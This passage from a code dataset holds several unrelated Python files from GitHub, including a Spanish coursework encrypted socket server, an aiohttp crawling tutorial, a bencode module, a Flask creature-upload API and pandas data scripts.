deciphertext1\r\n\r\n\r\ndef descifrar_mensaje(aes, iv, mensaje):\r\n aesCipher = Cipher(algorithms.AES(aes),\r\n modes.CTR(iv),\r\n backend = default_backend)\r\n aesDecryptor = aesCipher.decryptor()\r\n texto = aesDecryptor.update(mensaje)\r\n aesDecryptor.finalize()\r\n return texto\r\n\r\ndef calcular_hmac(binario, mac):\r\n codigo = hmac.HMAC(mac, hashes.SHA256(), backend = default_backend())\r\n codigo.update(binario)\r\n return codigo.finalize()\r\n\r\ndef firmar_llaves(aes, iv, mac, llave_privada):\r\n mensaje = aes + iv + mac\r\n signature = llave_privada.sign(mensaje,\r\n padding.PSS(\r\n mgf=padding.MGF1(hashes.SHA256()),\r\n salt_length=padding.PSS.MAX_LENGTH),\r\n hashes.SHA256())\r\n return signature\r\n\r\n\r\ndef crear_socket_servidor(puerto):\r\n servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n servidor.bind(('', int(puerto))) # hace el bind en cualquier interfaz disponible\r\n return servidor\r\n\r\n\r\ndef broadcast(mensaje, clientes, llave_publica_receptor, llave_privada_propia):\r\n print( 'Mensaje cifrado: ', mensaje )\r\n\r\n llaves_cifradas = mensaje[:256]\r\n mensaje = mensaje[256:]\r\n\r\n firma = mensaje[:256]\r\n mensaje = mensaje[256:]\r\n\r\n mac = mensaje[29:]\r\n\r\n mensaje_cifrado = mensaje[:29]\r\n llaves= descifrar_llaves(llaves_cifradas, llave_publica_receptor)\r\n aes= llaves[:16]\r\n # print(\"llaves: \", llaves)\r\n # print(b\"aes: \",aes)\r\n llaves = llaves[16:]\r\n iv= llaves[:16]\r\n # print(b\"iv: \",iv)\r\n llaves = llaves[16:]\r\n mac= llaves\r\n # print(b\"mac: \",mac)\r\n\r\n firmas = firmar_llaves(aes, iv, mac, llave_publica_receptor) # paso 2\r\n print( 'llaves firmadas-------------------------------------------------------------------------')\r\n print (firmas)\r\n print( 'llaves firmadas-------------------------------------------------------------------------')\r\n\r\n\r\n mensaje_descifrado = descifrar_mensaje(aes, iv, mensaje_cifrado) # paso 3\r\n print( 'mensaje-------------------------------------------------------------------------')\r\n print (mensaje_descifrado)\r\n print( 'mensaje-------------------------------------------------------------------------')\r\n codigo_mac = calcular_hmac(llaves_cifradas + firma + mensaje_cifrado, mac) # paso 4\r\n print( 'codigo mac-------------------------------------------------------------------------')\r\n print (codigo_mac)\r\n print( 'codigo mac-------------------------------------------------------------------------')\r\n\r\n return 0\r\n \r\n\r\n\r\n \r\n# Hilo para leer mensajes de clientes\r\ndef atencion(cliente, clientes, llave_publica_receptor, llave_privada_propia):\r\n while True:\r\n mensaje = mensajes.leer_mensaje(cliente)\r\n if mensaje.strip() == b'exit':\r\n cliente.close()\r\n return\r\n broadcast(mensaje, clientes, llave_publica_receptor, llave_privada_propia)\r\n \r\n\r\ndef escuchar(servidor, llave_publica_receptor, llave_privada_propia):\r\n servidor.listen(5) # peticiones de conexion simultaneas\r\n clientes = []\r\n while True:\r\n cliente, _ = servidor.accept() # bloqueante, hasta que llegue una peticion\r\n clientes.append(cliente)\r\n hiloAtencion = threading.Thread(target=atencion, args=\r\n (cliente, clientes, llave_publica_receptor, llave_privada_propia)) # se crea un hilo de atención por cliente\r\n hiloAtencion.start()\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n servidor = crear_socket_servidor(sys.argv[1])\r\n\r\n llave_publica_path = sys.argv[2] # ruta de archivo en formato PEM\r\n llave_publica_receptor = llaves.recuperar_privada_from_path(llave_publica_path)\r\n llave_privada_propia_path = sys.argv[3]\r\n llave_privada_propia = llaves.recuperar_publica_from_path(llave_privada_propia_path)\r\n\r\n print('Escuchando...')\r\n escuchar(servidor, llave_publica_receptor, llave_privada_propia)\r\n\r\n","repo_name":"RamssesMH/Criptografia-con-python","sub_path":"tema6/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32399474867","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Author: Aixiu\r\n# @Time : 2022/10/15 16:21:06\r\n\r\n# 环境安装 pip install aiohttp\r\n# 使用该模块中的 ClientSession\r\nimport aiohttp\r\nimport asyncio\r\nimport time\r\n\r\nstart = time.time()\r\nurls = [\r\n 'http://127.0.0.1:5000/bobo',\r\n 'http://127.0.0.1:5000/jay',\r\n 'http://127.0.0.1:5000/tom',\r\n]\r\n\r\nasync def get_page(url):\r\n print(f'正在下载 {url}')\r\n \r\n # response.get是基于同步的,必须使用基于异步的网络请求模块进行指定 url的请求发送\r\n # response = requests.get(url=url)\r\n \r\n # aiohttp: 基于异步网络请求的模块 请看 07-aiohttp实现多任务异步协程.py\r\n # 利用 aiohttp.ClientSession() 返回一个对象,取名为:session\r\n async with aiohttp.ClientSession() as session:\r\n # 进行 session 对象发送请求\r\n # 所有的 with 前边都需要 async 进行修饰,固定写法\r\n # 请求对象返回一个 response 响应数据对象\r\n \r\n # get(),post():\r\n # 如果要进行UA伪装,需要 headers = {}, get里用parame = {}, post里用data = {},代理proxy = 'http://ip:port' 是字符串,不再是字典\r\n async with await session.get(url=url) as response: # get发起请求有网络IO阻塞,耗时阻塞,需挂起,挂起方法:await 关键字\r\n # text()返回的字符串形式的响应数据\r\n # read()返回的二进制形式的响应数据\r\n # json()返回的就是json对象\r\n \r\n # 注意:获取响应数据操作之前一定要使用 await 进行手动挂机,不然会报下边RuntimeWarning\r\n # 在异步网页请求中,只要碰到阻塞或等待的代码,就需要手动挂机\r\n page_text = await response.text() # RuntimeWarning: Enable tracemalloc to get the object allocation traceback\r\n print(page_text)\r\n \r\n \r\n print(f'下载完毕 {url}')\r\n \r\ntasks = [] # 多任务列表\r\n\r\nfor url in urls:\r\n c = get_page(url) # 函数get_page返回一个 async协程对象\r\n task = asyncio.ensure_future(c) # 将 async协程对象封装到任务对象 task 当中\r\n tasks.append(task) # 将任务对象,添加到任务列表中\r\n \r\n# 将任务列表注册到循环事件中\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(asyncio.wait(tasks))\r\n\r\nend = time.time()\r\n\r\nprint(f'总耗时:{end - start}')\r\n\r\n","repo_name":"aixiu/python-spider","sub_path":"路飞-小猿圈/05-高性能异步爬虫/07-aiohttp实现多任务异步协程.py","file_name":"07-aiohttp实现多任务异步协程.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73490593753","text":"class Node:\n def __init__(self, value=None, next=None):\n self.value = value\n self.next = next\n\n def __str__(self):\n return str(self.value)\n\ndef print_list(node):\n result = []\n while node is not None:\n result.append(str(node.value))\n node = node.next\n return \" \".join(result)\n\n\nclass Solution:\n \"\"\"Assumtion: node given must be in the middle of the linked list\"\"\"\n\n def get_length(self, head):\n \"\"\"\n :param head:\n :return: length:\n\n >>> head = Node(\"1\", (Node(\"2\", Node(\"mid\", Node(\"3\", Node(\"4\"))))))\n >>> Solution().get_length(head)\n 5\n \"\"\"\n if head is None:\n return\n length = 0\n while head is not None:\n head = head.next\n length += 1\n return length\n\n def remove_mid_node(self, head, node):\n \"\"\"\n :param node:\n :return: None:\n\n >>> head = Node(\"1\", (Node(\"2\", Node(\"mid\", Node(\"3\", Node(\"4\"))))))\n >>> Solution().remove_mid_node(head, head.next.next)\n \"\"\"\n middle = self.get_length(head) // 2\n previous = head\n current = head.next\n\n for _ in range(middle - 1):\n previous = current\n current = current.next\n\n if current == node:\n previous.next = current.next\n current.next = None\n\n if current != node:\n raise ValueError\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(verbose=True)","repo_name":"laura-barluzzi/Cracking-the-Coding-Interview","sub_path":"2.LinkedLists/2.3.py","file_name":"2.3.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35996446127","text":"import numpy as np\nimport pandas as pd\nimport math\n\n\n# 배당금 위험-수익률 데이터 생성\ndef dividend():\n divid = pd.read_csv('dividend_final.csv')\n stock_address = ('stocks_data/')\n\n columns = ['회사명', '수익률', '변동성']\n df = pd.DataFrame(columns=columns)\n\n for idx, row in divid.iterrows():\n try:\n stock = pd.read_csv(stock_address + row['회사명'] + '.csv')\n\n # 1개월 변동성 계산 -> 1년 변동성으로 변환\n danger = 0\n month = stock.tail(30)\n\n daily_profits = []\n daily_cost = stock.tail(31).iloc[0]['Close']\n for month_idx, month_row in month.iterrows():\n # danger += (month_row['High'] - month_row['Low']) / month_row['Close'] * 100\n daily_profits.append(math.log(month_row['Close'] / daily_cost))\n daily_cost = month_row['Close']\n volatility = np.std(daily_profits)\n volatility *= math.sqrt(252) * 100\n\n # 비용\n cost = stock.tail(1).iloc[0]['Close']\n profit = row['유형1 당기']\n rate = int(profit) / cost * 100\n if rate > 30:\n return\n\n s = pd.Series([row['회사명'], rate, volatility], index=columns)\n\n # append\n df = df.append(s, ignore_index=True)\n\n except Exception as e:\n # print (e)\n continue\n\n df = df.dropna()\n df_valid = df[df['수익률'] != 0]\n df_valid = df_valid.reset_index()\n df_valid = df_valid.drop(axis=1, columns=['index'])\n # print(df_valid)\n return df_valid\n\n\n'''\n# 채권 데이터 생성\ndef bond():\n columns = ['상품명', '수익률', '만기일', '위험도']\n df = pd.DataFrame(columns = columns)\n data = []\n data.append(['30년물', 1.707, 360, 0])\n data.append(['10년물', 1.608, 120, 0])\n data.append(['5년물', 1.299, 60, 0])\n data.append(['3년물', 0.963, 36, 0])\n data.append(['1년물', 0.695, 12, 0])\n\n for item in data:\n df = df.append(pd.Series(item, index = columns), ignore_index= True)\n\n #print (df)\n return df\n'''\n# main\ndf_dividend = dividend()\n# df_deposit, df_saving = deposit()\n# df_bond = bond()\n\ndf_dividend = df_dividend.reset_index()\n# df_deposit = df_deposit.reset_index()\n# df_saving = df_saving.reset_index()\n# df_bond = df_bond.reset_index()\n\ndf_dividend.rename(columns={'회사명': '상품명', '변동성': '위험도'}, inplace=True)\n# df_deposit.rename(columns = {'금리': '수익률'}, inplace = True)\n# df_saving.rename(columns = {'금리': '수익률'}, inplace = True)\n\ndf_dividend['상품유형'] = '배당금'\n# df_deposit['상품유형'] = '예금'\n# df_saving['상품유형'] = '적금'\n# df_bond['상품유형'] = '국채'\n\ncolumns = ['index', '상품명', '수익률', '위험도', '상품유형']\n\ndf = pd.DataFrame(columns=columns)\ndf = df.append(df_dividend)\n# df = df.append(df_deposit)\n# df = df.append(df_saving)\n# df = df.append(df_bond)\n\ndf.drop(columns=df.columns[5:len(df.columns)], inplace=True)\n\nprint('idx,상품명,y,x')\nfor idx, row in df.iterrows():\n print(str(idx) + ',' + row[\"상품명\"] + \",\" + str(row[\"수익률\"]) + \",\" + str(row[\"위험도\"]))\n print(row)\n # print(type(row))\n\n# print(df)\n# print(df.columns)\n\ndf.to_csv('/home/selab/Desktop/chatbot/node/Capstone/Server/public/data_dividend.csv')\n","repo_name":"okeycsy/20-2-Capstone-Hedge-","sub_path":"배당에 관한 사항/dataset_div.py","file_name":"dataset_div.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"29781435056","text":"from django.urls import path\nfrom .import views\n\nurlpatterns = [\n path('',views.base,name=\"base\"),\n path('day1',views.day1 ,name='day1'),\n path('day2',views.day2 ,name='day2'),\n path('day3',views.day3 ,name='day3'),\n path('day4',views.day4 ,name='day4'),\n]","repo_name":"ranasalman3838/javascriptpractice","sub_path":"jsapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28787334896","text":"from ble_device import BleDevice\nfrom mqtt_client import MqttClient\nfrom handler import Handler\n\nmac = \"xx:xx:xx:xx:xx:xx\"\nthing_id = \"1\"\n\nip = \"xxx.xxx.xxx.xxx\"\nport = 1883\nclient_name = \"Client\"\n\n#file_name = \"data.txt\"\nminutes = 0.5\n\nthing = BleDevice(mac, thing_id)\nmqtt = MqttClient(ip, port, client_name)\nhandler = Handler()\n\nthing.connect()\nmqtt.connect()\n\nhandler.mqtt_setup(mqtt)\n#handler.open_file(file_name)\n#thing.print_svc_char()\nthing.setup()\nthing.set_handler(handler)\n\nthing.get_data(minutes)\n\nthing.disconnect()\nmqtt.disconnect()\n#handler.close_file()","repo_name":"thanospan/EESTech-Challenge-2018-2019","sub_path":"RPi/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"4143281689","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport argparse\n\nfrom helpers.results_data import nip_stats\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Summarize results of NIP training')\n parser.add_argument('dirs', nargs='*', default=['./data/models/nip'])\n parser.add_argument('--stats', dest='stats', action='store_true', default=False,\n help='Display summary stats')\n parser.add_argument('--n', dest='n', action='store', default=1, type=int,\n help='Set > 1 to average last N samples')\n\n args = parser.parse_args()\n\n for dirname in args.dirs:\n if os.path.exists(dirname):\n print('\\n# {}'.format(dirname))\n df = nip_stats(dirname, args.n)\n print('\\n', df.to_string())\n\n if args.stats:\n print('\\nPer-pipeline summary:\\n')\n print(df.groupby('pipeline').mean().reset_index().to_string())\n\n else:\n print('Error: directory {} does not exist!'.format(os.path.abspath(dirname)))\n sys.exit(1)\n","repo_name":"pkorus/neural-imaging","sub_path":"summarize_nip.py","file_name":"summarize_nip.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"5"} +{"seq_id":"20304793712","text":"# The contents of this file are subject to the BitTorrent Open Source License\n# Version 1.1 (the License). You may not copy or use this file, in either\n# source code or executable form, except in compliance with the License. You\n# may obtain a copy of the License at http://www.bittorrent.com/license/.\n#\n# Software distributed under the License is distributed on an AS IS basis,\n# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\n# for the specific language governing rights and limitations under the\n# License.\n\n# Written by Petru Paler\n\n\n# SOURCE: https://pypi.python.org/pypi/BitTorrent-bencode\n# Modify file for using on python 3\n\n\nclass BTFailure(Exception):\n pass\n\n\ndef decode_int(x, f):\n f += 1\n newf = x.index('e', f)\n n = int(x[f:newf])\n if x[f] == '-':\n if x[f + 1] == '0':\n raise ValueError\n elif x[f] == '0' and newf != f+1:\n raise ValueError\n return n, newf+1\n\n\ndef decode_string(x, f):\n colon = x.index(':', f)\n n = int(x[f:colon])\n if x[f] == '0' and colon != f+1:\n raise ValueError\n colon += 1\n return x[colon:colon+n], colon+n\n\n\ndef decode_list(x, f):\n r, f = [], f+1\n while x[f] != 'e':\n v, f = decode_func[x[f]](x, f)\n r.append(v)\n return r, f + 1\n\n\ndef decode_dict(x, f):\n r, f = {}, f+1\n while x[f] != 'e':\n k, f = decode_string(x, f)\n r[k], f = decode_func[x[f]](x, f)\n return r, f + 1\n\n\ndecode_func = {\n 'l': decode_list,\n 'd': decode_dict,\n 'i': decode_int,\n '0': decode_string,\n '1': decode_string,\n '2': decode_string,\n '3': decode_string,\n '4': decode_string,\n '5': decode_string,\n '6': decode_string,\n '7': decode_string,\n '8': decode_string,\n '9': decode_string\n}\n\n\ndef bdecode(x):\n try:\n r, l = decode_func[x[0]](x, 0)\n except (IndexError, KeyError, ValueError):\n raise BTFailure(\"not a valid bencoded string\")\n if l != len(x):\n raise BTFailure(\"invalid bencoded value (data after valid prefix)\")\n return r\n\ntry:\n from types import StringType, IntType, LongType, DictType, ListType, TupleType\nexcept:\n StringType = str\n IntType = int\n LongType = int\n DictType = dict\n ListType = list\n TupleType = tuple\n\n\nclass Bencached(object):\n __slots__ = ['bencoded']\n\n def __init__(self, s):\n self.bencoded = s\n\n\ndef encode_bencached(x,r):\n r.append(x.bencoded)\n\n\ndef encode_int(x, r):\n r.extend(('i', str(x), 'e'))\n\n\ndef encode_string(x, r):\n r.extend((str(len(x)), ':', x))\n\n\ndef encode_list(x, r):\n r.append('l')\n for i in x:\n encode_func[type(i)](i, r)\n r.append('e')\n\n\ndef encode_dict(x,r):\n r.append('d')\n ilist = list(x.items())\n ilist.sort()\n for k, v in ilist:\n r.extend((str(len(k)), ':', k))\n encode_func[type(v)](v, r)\n r.append('e')\n\n\nencode_func = {\n Bencached: encode_bencached,\n IntType: encode_int,\n LongType: encode_int,\n StringType: encode_string,\n ListType: encode_list,\n TupleType: encode_list,\n DictType: encode_dict,\n}\n\ntry:\n try:\n from types import BooleanType\n except:\n BooleanType = bool\n\n def encode_bool(x, r):\n encode_int(1 if x else 0, r)\n\n encode_func[BooleanType] = encode_bool\n\nexcept:\n pass\n\n\ndef bencode(x):\n r = []\n encode_func[type(x)](x, r)\n return ''.join(r)\n","repo_name":"gil9red/SimplePyScripts","sub_path":"torrent_file/bencode_py3.py","file_name":"bencode_py3.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"69995728793","text":"#!/usr/bin/python3\n\"\"\"post request and print body\"\"\"\nif __name__ == \"__main__\":\n from sys import argv\n import requests\n req = requests.get(argv[1])\n status = req.status_code\n body = req.text\n if status >= 400:\n print(\"Error code:\", status)\n else:\n print(body)\n","repo_name":"GEEK1050/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/7-error_code.py","file_name":"7-error_code.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36933171191","text":"class Solution:\n def minRemoveToMakeValid(self, s: str) -> str:\n s = list(s)\n stack = []\n for i, char in enumerate(s):\n if char == '(':\n stack.append(i)\n elif char == ')':\n if stack:\n stack.pop()\n else:\n s[i] = ''\n while stack:\n s[stack.pop()] = ''\n return ''.join(s)\n","repo_name":"akashanup/75DaysChallenge","sub_path":"1249.MinimumRemoveToMakeValidParentheses/elegant-solution.py","file_name":"elegant-solution.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"25647424232","text":"import matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\nfrom scipy.integrate import solve_ivp\nfrom mpl_toolkits.mplot3d import Axes3D \n\ndef draw_phase_portrait(alpha):\n \"\"\"\n Draws phase portrait of the system.\n\n :param alpha: Alpha value to draw corresponding phase portrait.\n \"\"\"\n x = np.arange(-2, 2.01, 0.01)\n x1, x2 = np.meshgrid(x, x)\n y1 = alpha * x1 - x2 - x1 * (x1 ** 2 + x2 ** 2)\n y2 = x1 + alpha * x2 - x2 * (x1 ** 2 + x2 ** 2)\n\n fig = plt.figure()\n ax0 = fig.add_subplot()\n ax0.streamplot(x1, x2, y1, y2, color='dodgerblue', linewidth=1)\n ax0.set_title(\"alpha = {}\".format(alpha))\n ax0.set_xlim([-2,2])\n ax0.set_ylim([-2,2])\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.show()\n\n\ndef calculate_next_state(t, x):\n \"\"\"\n Computes next state of given function based on the previous x value.\n\n :param t: One-dimensional independent variable (time)\n :param x: State of the function.\n :return: New state of the function.\n \"\"\"\n v = [(x[0] - x[1] - x[0] * (x[0] ** 2 + x[1] ** 2)),\n (x[0] + x[1] - x[1] * (x[0] ** 2 + x[1] ** 2))]\n\n x_new = [t * v[0] + x[0], t * v[1] + x[1]]\n\n return x_new\n\n\ndef plot_by_euler_method(x, end_time):\n \"\"\"\n Plots trajectory using Euler Method.\n\n :param x: State of the function.\n :param end_time: Upper bound of simulation time.\n :return: Coordinates of the calculated points.\n \"\"\"\n time_step = 0.001\n points = []\n time = 0\n while time < end_time:\n x = calculate_next_state(t=time_step, x=x)\n points.append(x)\n time += time_step\n\n return [i[0] for i in points], [i[1] for i in points]\n\n\ndef plot_by_svd_solver(x, end_time):\n \"\"\"\n Plots trajectory using solve_ivp.\n\n :param x: State of the function.\n :param end_time: Upper bound of simulation time.\n :return: Coordinates of the calculated points.\n \"\"\"\n t = 0\n sol = solve_ivp(calculate_next_state, [t, t + end_time], np.array(x))\n return sol.y\n\n\ndef cuspFunction(x,alpha1,alpha2):\n \"\"\"\n Computes result of cusp function given its parameters.\n\n :param x: State of the function.\n :param alpha1: First alpha parameter of the function.\n :param alpha2: Second alpha parameter of the function.\n :return: Returns solution of the function.\n \"\"\"\n return alpha1 + alpha2*x - x**3\n\n\ndef cuspBifurcation():\n \"\"\"\n Plots cusp bifurcation.\n \"\"\"\n fig = plt.figure(figsize=(10,10))\n ax0 = fig.gca(projection='3d')\n alpha = np.arange(-1, 1.01, 0.01)\n x_values = np.arange(-1, 1.01, 0.01)\n alpha1, alpha2 = np.meshgrid(alpha, alpha)\n\n for z in x_values:\n X,Y = alpha1,alpha2\n Z = cuspFunction(z,X,Y)\n cset = ax0.contour(X, Y, Z+z, [z], zdir='z', colors = \"brown\", antialiased=True, linestyles='dotted')\n\n ax0.set_xlabel('alpha1')\n ax0.set_ylabel('alpha2')\n ax0.set_zlabel('x')\n\n plt.title(\"Cusp Bifurcation\")\n plt.show()\n\n\ndef main():\n\n cuspBifurcation()\n \n alphas = [-1,0,1]\n for alpha in alphas:\n draw_phase_portrait(alpha)\n\n fig = plt.figure(figsize=(8,5))\n end_time = 400\n cmap = [\"BuPu\", \"Purples\", \"bwr\"][1]\n initial_points = [[2, 0], [0.5, 0]]\n for index, x in enumerate(initial_points):\n euler_sol = plot_by_euler_method(x, end_time)\n plt.scatter(euler_sol[0], euler_sol[1],linewidth=1,s=1,color=\"teal\")\n plt.scatter(euler_sol[0][0], euler_sol[1][0],color =\"lightcoral\",s=10, label=\"Starting Point\")\n plt.scatter(euler_sol[0][-1], euler_sol[1][-1],color =\"firebrick\",s=10,label=\"Ending Point\")\n plt.title(\"Euler's Method: {}\".format(initial_points[index]))\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.legend(bbox_to_anchor=(1.05, 1.0), loc='upper left')\n plt.tight_layout()\n plt.show()\n\n svd_sol = plot_by_svd_solver(x, end_time)\n plt.scatter(svd_sol[0], svd_sol[1],s=1,color=\"teal\")\n plt.scatter(svd_sol[0][0], svd_sol[1][0],color =\"lightcoral\",s=10, label=\"Starting Point\")\n plt.scatter(svd_sol[0][-1], svd_sol[1][-1],color =\"firebrick\",s=10,label=\"Ending Point\")\n plt.title(\"SVD Method: {}\".format(initial_points[index]))\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.legend()\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"crowdmodeling20ss/exercise3","sub_path":"task3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"32672757350","text":"from database import *\n\n# from databaseClasses.Project import Project\n\n\nclass File:\n def __init__(\n self,\n file_name=\"\",\n file_reference=\"\",\n file_size=\"\",\n file_type=\"\",\n url_reference=\"\",\n has_useCase_diagram=False,\n has_Class_diagram=False,\n usecase_diagram_url_reference=None,\n class_diagram_url_reference=None,\n ):\n self.file_name = file_name\n self.file_reference = file_reference\n self.file_size = file_size\n self.file_type = file_type\n self.url_reference = url_reference\n self.has_useCase_diagram = has_useCase_diagram\n self.has_Class_diagram = has_Class_diagram\n self.usecase_diagram_url_reference = usecase_diagram_url_reference\n self.class_diagram_url_reference = class_diagram_url_reference\n\n def get_file_data(self):\n file_dict = {\n \"name\": self.file_name,\n \"type\": self.file_type,\n \"size\": self.file_size,\n \"file_reference\": self.file_reference,\n \"url_reference\": self.url_reference,\n \"has_useCase_diagram\": self.has_useCase_diagram,\n \"has_Class_diagram\": self.has_Class_diagram,\n \"usecase_diagram_url_reference\": self.usecase_diagram_url_reference,\n \"class_diagram_url_reference\": self.class_diagram_url_reference,\n }\n return file_dict\n\n def delete_single_file(self, deleted_file):\n # needs user_id & project_id & file_name\n # project = Project(\n # user_id=deleted_file[\"user_id\"], project_id=deleted_file[\"project_id\"]\n # )\n user_id = deleted_file[\"user_id\"]\n project_id = deleted_file[\"project_id\"]\n\n print(\"Deleting file in database file\")\n print(f\"user id in delete_file database file = {user_id}\")\n print(f\"file_name in delete_file database file = {self.file_name}\")\n print(f\"project_id id in delete_file database file = {project_id}\")\n\n file_ref = (\n db.collection(\"users\")\n .document(user_id)\n .collection(\"projects\")\n .document(project_id)\n )\n\n # Delete the file from Firebase Firestore\n # doc = file_ref.get()\n file_ref.set(\n {\n \"files\": {},\n },\n merge=True,\n )\n\n return file_ref\n\n def generate_useCase_diagram_with_file(self):\n # needs user_id & user_name & project_id & project_name & file_url_reference & file_name\n pass\n\n def get_content_text(self):\n # print(f\"self.url_reference = {self.url_reference}\")\n response = requests.get(self.url_reference)\n # print(f\"response.text { response.text}\")\n return response.text\n","repo_name":"KirolosYassa/ba-automation","sub_path":"backend/databaseClasses/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31274460290","text":"import os\n\nfrom uuid import uuid4\nfrom flask import session, request, send_file\nfrom flask_restful import Resource\n\nfrom warpserver.server import logger\nfrom warpserver.config import UPLOAD_FOLDER\nfrom warpserver.model import Creature, User\nfrom warpserver.model.base import db\nfrom warpserver.util import api_token_required\nfrom werkzeug.utils import secure_filename\n\n\nclass CreatureListResource(Resource):\n @api_token_required\n def get(self):\n creatures = db.session.query(Creature).filter(\n Creature.recipient_user_id == session[\"user\"][\"id\"]\n )\n creature_ids = []\n for creature in creatures:\n creature_ids.append(\n {\n \"id\": creature.id,\n \"filename\": \"%s_%s\" % (creature.uuid, creature.filename),\n }\n )\n return {\"creatures\": [creature.to_dict() for creature in creatures]}\n\n @api_token_required\n def post(self):\n if any(key not in request.files for key in [\"file\"]):\n return {\"message\": \"bad request\"}, 400\n if any(key not in request.form for key in [\"creature_name\", \"recipient\"]):\n return {\"message\": \"bad request\"}, 400\n f = request.files[\"file\"]\n creature_name = request.form[\"creature_name\"]\n recipient = request.form[\"recipient\"]\n recipient_user = (\n db.session.query(User).filter(User.username == recipient).first()\n )\n if not recipient_user:\n return {\"message\": \"recipient user not found\"}, 404\n sender_user = (\n db.session.query(User).filter(User.id == session[\"user\"][\"id\"]).first()\n )\n uuid = str(uuid4())\n file_path = os.path.join(\n UPLOAD_FOLDER, \"creatures\", \"%s_%s\" % (uuid, secure_filename(f.filename))\n )\n try:\n f.save(file_path)\n logger.debug(\n 'saved creature \"%s\" for user \"%s in %s\"'\n % (creature_name, recipient, file_path)\n )\n except Exception as e:\n logger.error(\"Failed to safe File %s - %s\" % (file_path, e))\n return {\"message\": e}, 500\n try:\n creature = Creature(\n creature_name,\n secure_filename(f.filename),\n sender_user,\n recipient_user,\n uuid,\n )\n db.session.add(creature)\n db.session.commit()\n logger.info(\n 'Creature \"%s\" successfully sent from %s to %s'\n % (creature_name, sender_user.username, recipient)\n )\n except Exception as e:\n logger.error(\n 'Failed to save creature \"%s\" to Database. %s' % (f.filename, e)\n )\n return {\"message\": e}, 500\n\n\nclass CreatureResource(Resource):\n \"\"\"Docstring\"\"\"\n\n @api_token_required\n def get(self, creature_id):\n creature = (\n db.session.query(Creature)\n .filter(\n Creature.id == creature_id\n and Creature.recipient_user_id == session[\"user\"][\"id\"]\n )\n .first()\n )\n if not creature:\n return {\"message\": \"creature not found\"}, 404\n file_path = os.path.join(\n UPLOAD_FOLDER, \"creatures\", \"%s_%s\" % (creature.uuid, creature.filename)\n )\n return send_file(\n file_path, attachment_filename=\"%s_%s\" % (creature.uuid, creature.filename)\n )\n\n @api_token_required\n def delete(self, creature_id):\n creature = (\n db.session.query(Creature)\n .filter(\n Creature.id == creature_id\n and Creature.recipient_user_id == session[\"user\"][\"id\"]\n )\n .first()\n )\n if not creature:\n return {\"message\": \"creature not found\"}, 404\n db.session.delete(creature)\n db.session.commit()\n return \"creature deleted\", 200\n","repo_name":"AlbianWarp/AlbianWarpServer","sub_path":"warpserver/resource/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"26835527290","text":"import pandas as pd\n\ndef importData(file_name:str):\n return pd.read_csv(file_name,sep=\"|\",decimal=\",\",nrows=200000)\n\ndef combineData(datasets):\n combined = pd.DataFrame()\n for dataset in datasets:\n combined = pd.concat([combined,dataset])\n return combined\n\ndef processDataforDashBoard(combined,log_lat):\n #Séparation par Jour,Mois,Année\n try:\n combined['Date mutation'] = pd.to_datetime(combined['Date mutation'], format='%d/%m/%Y')\n except ValueError as e:\n print(f\"Error: {e}\")\n\n combined[\"Année\"] = combined[\"Date mutation\"].dt.year\n combined[\"Mois\"] = combined[\"Date mutation\"].dt.month\n combined[\"Lib mois\"] = [\"Janvier\" if x==1 else \"Février\" if x==2 else \"Mars\" if x==3 else \"Avril\" if x==4 else \"Mai\" if x==5 else \"Juin\" if x==6 else \"Juillet\" if x==7 else \"Août\" if x==8 else \"Septembre\" if x==9 else \"Octobre\" if x==10 else \"Novembre\" if x==11 else \"Décembre\" if x==12 else x for x in combined[\"Mois\"]]\n combined[\"Jour\"] = combined[\"Date mutation\"].dt.day\n #Suppression des colonnes completement nulles\n combined.dropna(axis=1, how='all')\n #Suppression des lignes ou il y a une référence à la même vente 